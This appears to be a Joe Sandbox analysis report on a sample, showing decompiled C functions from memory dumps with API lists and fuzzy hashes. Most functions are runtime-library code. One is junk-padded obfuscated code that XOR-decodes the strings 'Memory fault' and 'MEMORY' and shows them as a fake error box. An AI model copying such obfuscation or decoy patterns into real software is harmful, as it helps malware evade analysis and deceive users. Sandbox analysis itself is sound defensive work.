				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0xffe778;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x10004e8;
				E00ECA9AB(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00ECA0C3();
				E00ECA9AB(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x10004d8; // 0x1000400
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E00ECC57E( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E00ECA499(E00ECA0CC());
			}








                                              0x00ec9fee
                                              0x00ec9fee
                                              0x00ec9ff0
                                              0x00ec9ff5
                                              0x00ec9ffa
                                              0x00eca000
                                              0x00eca008
                                              0x00eca00b
                                              0x00eca010
                                              0x00eca011
                                              0x00eca014
                                              0x00eca017
                                              0x00eca021
                                              0x00eca026
                                              0x00eca02e
                                              0x00eca036
                                              0x00eca046
                                              0x00eca046
                                              0x00eca04c
                                              0x00eca04f
                                              0x00eca056
                                              0x00eca05d
                                              0x00eca066
                                              0x00eca06c
                                              0x00eca073
                                              0x00eca079
                                              0x00eca080
                                              0x00eca087
                                              0x00eca08d
                                              0x00eca090
                                              0x00eca093
                                              0x00eca098
                                              0x00eca09a
                                              0x00eca09f
                                              0x00eca09f
                                              0x00eca0a5
                                              0x00eca0ab
                                              0x00eca0bc

                                              APIs
                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00FFF468,0000000C,00ECA129,00000000,00000000,?,00ECBFDC,?,00000001,?,?,00ECA935,00000018,00FFF4B8,0000000C), ref: 00ECA000
                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00ECA00B
                                                • Part of subcall function 00EC91EA: Sleep.KERNEL32(000003E8,00000000,?,00EC9F51,KERNEL32.DLL,?,00ECA9FD,?,00EC9154,?,00FFF408,0000000C,00EC8E51,?,?,00000000), ref: 00EC91F6
                                                • Part of subcall function 00EC91EA: GetModuleHandleW.KERNEL32(?,?,00EC9F51,KERNEL32.DLL,?,00ECA9FD,?,00EC9154,?,00FFF408,0000000C,00EC8E51,?,?,00000000,00000000), ref: 00EC91FF
                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00ECA034
                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00ECA044
                                              • __lock.LIBCMT ref: 00ECA066
                                              • InterlockedIncrement.KERNEL32(010004E8), ref: 00ECA073
                                              • __lock.LIBCMT ref: 00ECA087
                                              • ___addlocaleref.LIBCMT ref: 00ECA0A5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                              • API String ID: 1028249917-2843748187
                                              • Opcode ID: 372dde29c0d3a2c69b27c64f81856e85d2075c7af4d95e5d362f517df39fca7c
                                              • Instruction ID: 2420a31b826f67134eb7ceb3d37568247cebb26948b814a67ec99c34be8ed361
                                              • Opcode Fuzzy Hash: 372dde29c0d3a2c69b27c64f81856e85d2075c7af4d95e5d362f517df39fca7c
                                              • Instruction Fuzzy Hash: A211D271800709DFD720AF35D906F5ABBE0BF04358F10442DE4A9A32B1CBB59A42DB26
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC718E Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 90%
                                              			E00EC718E() {
				signed int _t152;
				signed int _t153;
				signed int _t154;
				signed int _t158;
				signed int _t160;
				signed int _t164;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				signed int _t176;
				signed int _t178;
				signed char _t183;
				WCHAR* _t186;
				void* _t217;
				signed int _t224;
				signed int _t225;
				signed int _t233;
				intOrPtr _t235;
				signed int _t236;
				intOrPtr _t237;
				void* _t238;
				char _t254;
				char _t255;
				signed int _t298;
				intOrPtr _t305;
				signed int _t314;
				signed char _t318;
				signed int _t319;
				char _t330;
				signed int _t336;
				char _t337;
				short _t338;
				intOrPtr _t340;
				intOrPtr _t342;
				signed char _t344;
				signed int _t347;
				signed int _t354;
				signed int _t365;
				signed char _t367;
				signed short _t369;
				WCHAR* _t370;
				signed int _t390;
				intOrPtr _t392;
				signed int _t397;
				signed int _t399;
				intOrPtr _t400;
				signed int _t401;
				signed int _t406;
				void* _t407;
				void* _t409;
				void* _t415;
				void* _t416;
				void* _t428;

				asm("adc ecx, [edx+0x2c]");
				 *((char*)(_t409 - 0xf0)) = 0x56;
				 *((char*)(_t409 - 0xef)) = 0x7e;
				 *((char*)(_t409 - 0xee)) = 0x76;
				 *((char*)(_t409 - 0xed)) = 0x74;
				 *((char*)(_t409 - 0xec)) = 0x69;
				 *((char*)(_t409 - 0xeb)) = 0x62;
				 *((char*)(_t409 - 0xea)) = 0x3b;
				 *((char*)(_t409 - 0xe9)) = 0x7d;
				 *((char*)(_t409 - 0xe8)) = 0x7a;
				 *((char*)(_t409 - 0xe7)) = 0x6e;
				 *((char*)(_t409 - 0xe6)) = 0x77;
				 *((char*)(_t409 - 0xe5)) = 0x6f;
				_t399 = 0;
				goto L4;
				L9:
				_t32 = _t399 - 0xf0; // 0x56
				 *(_t409 + _t399 * 2 - 0x190) = ( *(_t409 + _t32) ^ 0x0000001b) & 0x000000ff;
				_t399 = _t399 + 1;
				if(_t399 < 0xc) {
					L4:
					 *(_t409 - 0x30) = E00EC1000() & 0x000000ff;
					if( *(_t409 - 0x30) == 0) {
						_t152 =  *0x1000cdc;
						__eflags = _t152 - 0x8362;
						if(_t152 >= 0x8362) {
							__eflags =  *0x1000c9c;
							__eflags = (0 |  *0x1000c9c == 0x00000000) - _t152;
							if(__eflags == 0) {
								asm("sbb ecx, ecx");
								 *(_t409 - 6) =  *(_t409 - 8) & 0 | __eflags == 0x00000000;
								_t336 =  *0x1000d08 * 0x4cbe9a17;
								__eflags = _t336;
								 *0x1000cd2 =  *((intOrPtr*)(_t409 - 0x38)) - 0x14;
								 *0x1000c84 = _t336;
								 *(_t409 - 0x2c) =  *0x1000ca0;
							}
						}
					} else {
						_t337 = "d:\\th\\ds\\ext\\a"; // 0x745c3a64
						_t254 = "h\\ds\\ext\\a"; // 0x73645c68
						_t330 = "\\ext\\a"; // 0x7478655c
						 *((intOrPtr*)(_t409 - 0x174)) = _t337;
						_t338 =  *0xfff31c; // 0x615c
						 *((intOrPtr*)(_t409 - 0x170)) = _t254;
						_t255 =  *0xfff31e; // 0x0
						 *((intOrPtr*)(_t409 - 0x16c)) = _t330;
						 *((short*)(_t409 - 0x168)) = _t338;
						 *((char*)(_t409 - 0x166)) = _t255;
						 *((intOrPtr*)(_t409 - 0x165)) = 0;
					}
					goto L9;
				} else {
					_t153 =  *0x1000c88; // 0xa666078f
					_t415 = _t153 -  *0x1000ca8; // 0x7b8b5249
					if(_t415 == 0) {
						_t318 =  *0x1000c8c; // 0xfff500a5
						_t416 = _t318 -  *0x1000cac; // 0x106b42
						if(_t416 == 0) {
							_t392 =  *0x1000cf4; // 0x2b91c
							_t237 =  *0x1000cf0; // 0xd43579fe
							_t238 = E00ECEE50(_t237, _t392, 2, 0);
							_t319 = M01000CB0; // 0x0
							asm("sbb edx, esi");
							 *0x1000cf0 = _t238 - _t319;
							 *0x1000cf4 = _t392;
							 *(_t409 - 0x80) =  *(_t409 - 0xb) & 0x000000ff ^  *(_t409 - 0x80) & 0x0000ffff;
							 *(_t409 - 0x28) =  *(_t409 - 0x28) -  *0x1000d10 -  *(_t409 - 0x28);
							 *(_t409 - 8) =  *(_t409 - 0x6c) - 0x80;
							 *(_t409 - 6) =  *0x1000c9c +  *0x1000c9c;
						}
					}
					_t154 =  *0x1000cc0; // 0xffff970a
					_t340 =  *0x1000ca8; // 0x7b8b5249
					 *((short*)(_t409 - 0x178)) =  *(_t409 - 0x134) *  *(_t409 - 0x130) ^ 0x0000b7f8;
					 *(_t409 - 0x6c) = 0x5b39;
					 *((short*)(_t409 - 0x24)) = _t154 * 0x1e80;
					 *(_t409 - 0x6c) =  *0x1215420;
					 *((short*)(_t409 - 0x8c)) = _t340 + 0x7606;
					_t342 =  *((intOrPtr*)(_t409 - 2));
					 *0x1000c94 =  *(_t409 - 9) - 0x74bb;
					_t400 =  *((intOrPtr*)(_t409 - 0x44));
					asm("cdq");
					 *((char*)(_t409 - 0xe4)) = 0x80;
					 *((char*)(_t409 - 0xe3)) = 0x88;
					 *((char*)(_t409 - 0xe2)) = 0x80;
					 *((char*)(_t409 - 0xe1)) = 0x82;
					 *((char*)(_t409 - 0xe0)) = 0x9f;
					 *((char*)(_t409 - 0xdf)) = 0x94;
					if(_t342 !=  *((intOrPtr*)(_t409 - 0x48)) || _t342 != _t400) {
						_t158 = 1;
					} else {
						_t158 = 0;
						__eflags = 0;
					}
					_t401 =  *0x1000cb8; // 0x4
					_t344 = 0 |  *((intOrPtr*)(_t409 - 2)) != 0x00000064;
					if(_t158 == _t344) {
						_t233 =  *0x1000c88; // 0xa666078f
						_t344 =  *0x1000c8c; // 0xfff500a5
						 *0x1000cd8 = E00FFD310(_t233, 7, _t344);
						_t235 =  *0x1000c90; // 0xffff571c
						asm("cdq");
						_t236 =  *0x1000cbc; // 0x0
						asm("sbb eax, edx");
						 *(_t409 - 0x40) = _t401 - _t235;
						 *(_t409 - 0x3c) = _t236;
					}
					M01000CB0 = _t401 * 0xfd8bdd23;
					_t397 = 0;
					do {
						_t160 = E00EC1700();
						asm("cdq");
						 *0x1000cc8 = _t160;
						 *0x1000ccc = _t344;
						if((_t160 | _t344) != 0) {
							__eflags =  *(_t409 - 0x68) |  *(_t409 - 0x64);
							if(( *(_t409 - 0x68) |  *(_t409 - 0x64)) != 0) {
								_t164 = 0;
								__eflags = 0;
							} else {
								_t164 = 1;
							}
							_t347 = ( *(_t409 - 5) & 0x000000ff) *  *(_t409 - 0x28) * _t164;
							__eflags = _t347;
							 *(_t409 - 0x58) = _t347;
							 *(_t409 - 0x54) = 0;
						} else {
							if(( *(_t409 - 0x40) |  *(_t409 - 0x3c)) != 0) {
								_t224 = 0;
								__eflags = 0;
							} else {
								_t224 = 1;
							}
							if(_t224 << 4 != _t224 ||  *((intOrPtr*)(_t409 - 0x18)) != 0) {
								L32:
								_t225 = 1;
								goto L33;
							} else {
								_t390 =  *0x1000ca0; // 0x5247
								asm("adc eax, [0x1000ce4]");
								_t406 = M01000CB0; // 0x0
								_t407 = _t406 + _t390;
								_t314 =  !( *(_t409 - 0x58) +  *0x1000ce0);
								_t428 = 0 -  !( *(_t409 - 0x54));
								if(_t428 < 0 || _t428 <= 0 && _t407 <= _t314) {
									goto L32;
								} else {
									_t225 = 0;
									L33:
									if( !_t225 != 0) {
										 *(_t409 - 0x1c) = ( *(_t409 - 0x1c) & 0x0000ffff) - ( *(_t409 - 0x1c) & 0x0000ffff) +  *(_t409 - 0x4c);
										 *0x1000c9b =  *0x1215420;
									}
									goto L39;
								}
							}
						}
						L39:
						_t344 =  *(_t409 + _t397 - 0xe4) ^ 0x000000cd;
						 *(_t409 + _t397 * 2 - 0x148) = _t344 & 0x000000ff;
						_t397 = _t397 + 1;
					} while (_t397 < 6);
					 *0x1000cd0 =  *0x1000cd0 + 1;
					 *(_t409 - 0x4c) = 2;
					 *((short*)(_t409 - 0x24)) =  *0x1000c9a - 0x57;
					 *0x1000ca0 =  *0x1000ca0 &  *((intOrPtr*)(_t409 - 0x88)) + 0x7d5b2049;
					_t167 =  *(_t409 - 0x4c);
					if(_t167 == 0) {
						 *((intOrPtr*)(_t409 - 0x38)) =  *(_t409 - 0xf) - 0x399b134;
						 *((intOrPtr*)(_t409 - 0x34)) = 0;
						 *0x1000d00 =  *0x1000c88;
						 *0x1000d04 =  *0x1000c8c;
						_t354 =  *(_t409 - 0x68) +  *(_t409 - 0x40);
						asm("adc eax, esi");
						_t171 = E00ECEE50(E00ECEE50(_t354,  *(_t409 - 0x64),  *0x1000d18,  *0x1000d1c), _t354, 2, 0);
						__eflags = _t171 | _t354;
						if((_t171 | _t354) != 0) {
							_t173 = 0;
							__eflags = 0;
						} else {
							_t173 = 1;
						}
						 *(_t409 - 6) =  *0x1000ce0 |  *0x1000ce4;
						 *0x1000cf8 =  !( *(_t409 - 0x28) +  *0x1000cb4 + ((0 |  *(_t409 - 6) == 0x00000000) +  *0x1000c9e & 0x0000ffff)) * _t173;
						if(( *0x1000ce0 |  *0x1000ce4) != 0) {
							_t176 = 0;
							__eflags = 0;
						} else {
							_t176 = 1;
						}
						asm("sbb edx, edx");
						_t365 =  ~(( *(_t409 - 0xc) & 0x000000ff) + _t176) + 1;
						_t178 =  *0x1000cd0 * 0xda;
						__eflags = _t178;
						M01000CB0 = _t365;
						asm("cdq");
						 *(_t409 - 0x58) = _t178;
						 *(_t409 - 0x54) = _t365;
					} else {
						_t217 = _t167 - 1;
						if(_t217 == 0) {
							 *0x1000c9b =  *0x1000d00;
						} else {
							if(_t217 == 1) {
								 *0x1000ca0 = 0x737;
								 *(_t409 - 0xe) =  !(( *(_t409 - 0x5c) & 0x0000ffff) * ( *0x1000c9e + 1) + ( *(_t409 - 0x2c) & 0x0000ffff));
							}
						}
					}
					_t367 = 0x7bff - ( *(_t409 - 0x138) ^ 0x0000030e |  *(_t409 - 0xb8) * 0x000000a9);
					 *(_t409 - 0x13c) = _t367;
					_t183 = E00EC1190();
					asm("cdq");
					 *0x1000d04 = _t367;
					 *0x1000d00 = _t183 & 0x000000ff;
					if( *(_t409 - 9) != 0 ||  !( *(_t409 - 0x6c)) != 0) {
						_t369 =  *(_t409 - 0x80);
						asm("cdq");
						__eflags = (_t369 & 0x0000ffff) -  *0x1000c88;
						if((_t369 & 0x0000ffff) !=  *0x1000c88) {
							L59:
							__eflags =  *(_t409 - 0x80);
							if( *(_t409 - 0x80) == 0) {
								asm("sbb eax, eax");
								__eflags =  ~( *(_t409 - 0x4c)) + 1 -  *((intOrPtr*)(_t409 - 0x90));
								_t135 =  ~( *(_t409 - 0x4c)) + 1 ==  *((intOrPtr*)(_t409 - 0x90));
								__eflags = _t135;
								if(_t135 == 0) {
									__eflags =  *0x1000ca4 -  *((intOrPtr*)(_t409 - 0x24));
									if( *0x1000ca4 >=  *((intOrPtr*)(_t409 - 0x24))) {
										asm("cdq");
										asm("sbb esi, edx");
										__eflags =  *((intOrPtr*)(_t409 - 0xa0)) -  *0x1000c9c |  *(_t409 - 0x9c);
										if(( *((intOrPtr*)(_t409 - 0xa0)) -  *0x1000c9c |  *(_t409 - 0x9c)) != 0) {
											 *0x1000ca4 = (( *(_t409 - 0xe) & 0x000000ff) -  *0x1000cdc) * (( *(_t409 - 0xf) & 0x000000ff) +  !( *0x1000cdc) - ( *(_t409 - 0xc) & 0xff)) * (( *(_t409 - 9) & 0x000000ff) +  *0x1000c90);
											asm("cdq");
											 *(_t409 - 0x58) =  *(_t409 - 0x58) + ( *0x1000c98 & 0x0000ffff);
											asm("adc [ebp-0x54], edx");
											_t298 =  *(_t409 - 0xe) & 0x000000ff ^ 0x000000fe;
											__eflags = _t298;
											 *(_t409 - 8) = _t298;
										}
									}
								} else {
									 *0x1000c9a =  !( *0x1000c83);
									 *0x1000c9b =  *((intOrPtr*)(_t409 - 0x7c)) + 0x30;
								}
							}
							goto L65;
						}
						__eflags = _t369 -  *0x1000c8c;
						if(_t369 !=  *0x1000c8c) {
							goto L59;
						}
						 *((char*)(_t409 - 1)) =  *0x1000cd0;
						 *(_t409 - 0x5c) = ( *(_t409 - 8) & 0x000000ff) + ( *(_t409 - 8) & 0x000000ff) * 4 << 4;
						 *(_t409 - 5) =  *(_t409 - 0x4c) & 0x000000ea;
						goto L65;
					} else {
						if( !(0 | ( *(_t409 - 8) & 0xff) - ( !( *(_t409 - 0xb) & 0x000000ff) |  *(_t409 - 3) & 0xff) < 0x00000000) != 0) {
							_t305 =  *0x1000c9e; // 0x0
							 *((char*)(_t409 - 0xd)) = _t305 - 0x5b;
						}
						L65:
						_t370 = _t409 - 0x148;
						_t186 = _t409 - 0x190;
						MessageBoxW(GetForegroundWindow(), _t186, _t370, 0x10);
						return 0;
					}
				}
			}
























































                                              0x00ec718e
                                              0x00ec71b8
                                              0x00ec71bf
                                              0x00ec71c6
                                              0x00ec71cd
                                              0x00ec71d4
                                              0x00ec71db
                                              0x00ec71e2
                                              0x00ec71e9
                                              0x00ec71f0
                                              0x00ec71f7
                                              0x00ec71fe
                                              0x00ec7205
                                              0x00ec720c
                                              0x00ec720c
                                              0x00ec72d9
                                              0x00ec72d9
                                              0x00ec72e7
                                              0x00ec72ef
                                              0x00ec72f3
                                              0x00ec7210
                                              0x00ec7219
                                              0x00ec7224
                                              0x00ec726a
                                              0x00ec726f
                                              0x00ec7274
                                              0x00ec7278
                                              0x00ec7282
                                              0x00ec7284
                                              0x00ec72a4
                                              0x00ec72ac
                                              0x00ec72be
                                              0x00ec72be
                                              0x00ec72c4
                                              0x00ec72cf
                                              0x00ec72d5
                                              0x00ec72d5
                                              0x00ec7284
                                              0x00ec7226
                                              0x00ec7226
                                              0x00ec722c
                                              0x00ec7231
                                              0x00ec7237
                                              0x00ec723d
                                              0x00ec7244
                                              0x00ec724a
                                              0x00ec724f
                                              0x00ec7255
                                              0x00ec725c
                                              0x00ec7262
                                              0x00ec7262
                                              0x00000000
                                              0x00ec72f9
                                              0x00ec72f9
                                              0x00ec72fe
                                              0x00ec7304
                                              0x00ec7306
                                              0x00ec730c
                                              0x00ec7312
                                              0x00ec7314
                                              0x00ec731a
                                              0x00ec7324
                                              0x00ec7329
                                              0x00ec7333
                                              0x00ec7335
                                              0x00ec733a
                                              0x00ec734c
                                              0x00ec735c
                                              0x00ec736e
                                              0x00ec7371
                                              0x00ec7371
                                              0x00ec7312
                                              0x00ec7380
                                              0x00ec7388
                                              0x00ec739a
                                              0x00ec73a7
                                              0x00ec73ae
                                              0x00ec73b2
                                              0x00ec73bb
                                              0x00ec73c5
                                              0x00ec73d4
                                              0x00ec73dd
                                              0x00ec73e0
                                              0x00ec73e1
                                              0x00ec73e8
                                              0x00ec73ef
                                              0x00ec73f6
                                              0x00ec73fd
                                              0x00ec7404
                                              0x00ec740d
                                              0x00ec7413
                                              0x00ec741a
                                              0x00ec741a
                                              0x00ec741a
                                              0x00ec741a
                                              0x00ec741f
                                              0x00ec742a
                                              0x00ec742f
                                              0x00ec7431
                                              0x00ec7436
                                              0x00ec7443
                                              0x00ec7449
                                              0x00ec744e
                                              0x00ec7453
                                              0x00ec7458
                                              0x00ec745a
                                              0x00ec745d
                                              0x00ec745d
                                              0x00ec7466
                                              0x00ec746c
                                              0x00ec7470
                                              0x00ec7494
                                              0x00ec7495
                                              0x00ec7496
                                              0x00ec749d
                                              0x00ec74a3
                                              0x00ec752f
                                              0x00ec7532
                                              0x00ec753b
                                              0x00ec753b
                                              0x00ec7534
                                              0x00ec7534
                                              0x00ec7534
                                              0x00ec7549
                                              0x00ec7549
                                              0x00ec754c
                                              0x00ec754f
                                              0x00ec74a9
                                              0x00ec74af
                                              0x00ec74b8
                                              0x00ec74b8
                                              0x00ec74b1
                                              0x00ec74b1
                                              0x00ec74b1
                                              0x00ec74c3
                                              0x00ec7502
                                              0x00ec7502
                                              0x00000000
                                              0x00ec74ce
                                              0x00ec74da
                                              0x00ec74e0
                                              0x00ec74e6
                                              0x00ec74ec
                                              0x00ec74f2
                                              0x00ec74f4
                                              0x00ec74f6
                                              0x00000000
                                              0x00ec74fe
                                              0x00ec74fe
                                              0x00ec7507
                                              0x00ec750b
                                              0x00ec7520
                                              0x00ec7524
                                              0x00ec7524
                                              0x00000000
                                              0x00ec750b
                                              0x00ec74f6
                                              0x00ec74c3
                                              0x00ec7552
                                              0x00ec7559
                                              0x00ec7560
                                              0x00ec7568
                                              0x00ec7569
                                              0x00ec7579
                                              0x00ec7580
                                              0x00ec758a
                                              0x00ec759d
                                              0x00ec75a3
                                              0x00ec75a5
                                              0x00ec7604
                                              0x00ec7607
                                              0x00ec760d
                                              0x00ec7615
                                              0x00ec7621
                                              0x00ec7631
                                              0x00ec763f
                                              0x00ec7644
                                              0x00ec7646
                                              0x00ec764f
                                              0x00ec764f
                                              0x00ec7648
                                              0x00ec7648
                                              0x00ec7648
                                              0x00ec767d
                                              0x00ec7683
                                              0x00ec768a
                                              0x00ec7693
                                              0x00ec7693
                                              0x00ec768c
                                              0x00ec768c
                                              0x00ec768c
                                              0x00ec76a6
                                              0x00ec76a8
                                              0x00ec76a9
                                              0x00ec76a9
                                              0x00ec76af
                                              0x00ec76b5
                                              0x00ec76b6
                                              0x00ec76b9
                                              0x00ec75a7
                                              0x00ec75a7
                                              0x00ec75aa
                                              0x00ec75e3
                                              0x00ec75ac
                                              0x00ec75af
                                              0x00ec75cc
                                              0x00ec75d6
                                              0x00ec75d6
                                              0x00ec75af
                                              0x00ec75aa
                                              0x00ec76da
                                              0x00ec76e7
                                              0x00ec76ee
                                              0x00ec76f6
                                              0x00ec76f7
                                              0x00ec7700
                                              0x00ec7707
                                              0x00ec774c
                                              0x00ec7753
                                              0x00ec7754
                                              0x00ec775a
                                              0x00ec778c
                                              0x00ec7790
                                              0x00ec7793
                                              0x00ec77a8
                                              0x00ec77ad
                                              0x00ec77af
                                              0x00ec77af
                                              0x00ec77b4
                                              0x00ec77da
                                              0x00ec77e0
                                              0x00ec77f9
                                              0x00ec77fc
                                              0x00ec77fe
                                              0x00ec7800
                                              0x00ec783b
                                              0x00ec7847
                                              0x00ec7848
                                              0x00ec784b
                                              0x00ec7852
                                              0x00ec7852
                                              0x00ec7858
                                              0x00ec7858
                                              0x00ec7800
                                              0x00ec77b6
                                              0x00ec77c3
                                              0x00ec77c8
                                              0x00ec77c8
                                              0x00ec77b4
                                              0x00000000
                                              0x00ec7793
                                              0x00ec775c
                                              0x00ec7762
                                              0x00000000
                                              0x00000000
                                              0x00ec7769
                                              0x00ec7778
                                              0x00ec7784
                                              0x00000000
                                              0x00ec7712
                                              0x00ec7735
                                              0x00ec773b
                                              0x00ec7744
                                              0x00ec7744
                                              0x00ec785b
                                              0x00ec785b
                                              0x00ec7861
                                              0x00ec7872
                                              0x00ec7880
                                              0x00ec7880
                                              0x00ec7707

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 9[$RP'{$V~vtib;}znwo$d:\th\ds\ext\a
                                              • API String ID: 0-3982907625
                                              • Opcode ID: 9cfb994bde935c57283e854f0542a746c712ff35afba2b18be228b8ac6627682
                                              • Instruction ID: a04e41871af9636ef3727071f1582acbbecefd261cfccf8909fcfa0af028f4f3
                                              • Opcode Fuzzy Hash: 9cfb994bde935c57283e854f0542a746c712ff35afba2b18be228b8ac6627682
                                              • Instruction Fuzzy Hash: 2AC10330D082998BCB25CF68D980BEDBBB1AF19344F049199E4D9B7348DB3A4942CF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00ECC980 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                              Download Yara Rule
                                              C-Code - Quality: 89%
                                              			E00ECC980(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0xfff5b8);
				E00ECA454(__ebx, __edi, __esi);
				_t31 = E00ECA14E(__ebx, __edx, __edi, _t35);
				_t15 =  *0x1000b14; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E00ECA9AB(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x1000910; // 0x2862bb8
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10004e8;
								if(__eflags != 0) {
									_push(_t33);
									E00ECBECE(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x1000910; // 0x2862bb8
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x1000910; // 0x2862bb8
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00ECCA1B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E00EC921A(_t29, _t31, 0x20);
				}
				return E00ECA499(_t33);
			}










                                              0x00ecc980
                                              0x00ecc980
                                              0x00ecc980
                                              0x00ecc980
                                              0x00ecc982
                                              0x00ecc987
                                              0x00ecc991
                                              0x00ecc993
                                              0x00ecc99b
                                              0x00ecc9bc
                                              0x00ecc9c2
                                              0x00ecc9c6
                                              0x00ecc9c9
                                              0x00ecc9cc
                                              0x00ecc9d2
                                              0x00ecc9d4
                                              0x00ecc9d6
                                              0x00ecc9d9
                                              0x00ecc9df
                                              0x00ecc9e1
                                              0x00ecc9e3
                                              0x00ecc9e9
                                              0x00ecc9eb
                                              0x00ecc9ec
                                              0x00ecc9f1
                                              0x00ecc9e9
                                              0x00ecc9e1
                                              0x00ecc9f2
                                              0x00ecc9f7
                                              0x00ecc9fa
                                              0x00ecca00
                                              0x00ecca04
                                              0x00ecca04
                                              0x00ecca0a
                                              0x00ecca11
                                              0x00ecc9a3
                                              0x00ecc9a3
                                              0x00ecc9a3
                                              0x00ecc9a8
                                              0x00ecc9ac
                                              0x00ecc9b1
                                              0x00ecc9b9

                                              APIs
                                              • __getptd.LIBCMT ref: 00ECC98C
                                                • Part of subcall function 00ECA14E: __getptd_noexit.LIBCMT ref: 00ECA151
                                                • Part of subcall function 00ECA14E: __amsg_exit.LIBCMT ref: 00ECA15E
                                              • __amsg_exit.LIBCMT ref: 00ECC9AC
                                              • __lock.LIBCMT ref: 00ECC9BC
                                              • InterlockedDecrement.KERNEL32(?), ref: 00ECC9D9
                                              • InterlockedIncrement.KERNEL32(02862BB8), ref: 00ECCA04
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                              • String ID:
                                              • API String ID: 4271482742-0
                                              • Opcode ID: 5a2cee5ae7ec21b7bbc585cac7de06eca6d260aba795f08ee2e165cb00bb843e
                                              • Instruction ID: 402bd1faf23c31466f65d924fd80851eec2cfb3c6d9b5864d4ebb05a8bf1c73f
                                              • Opcode Fuzzy Hash: 5a2cee5ae7ec21b7bbc585cac7de06eca6d260aba795f08ee2e165cb00bb843e
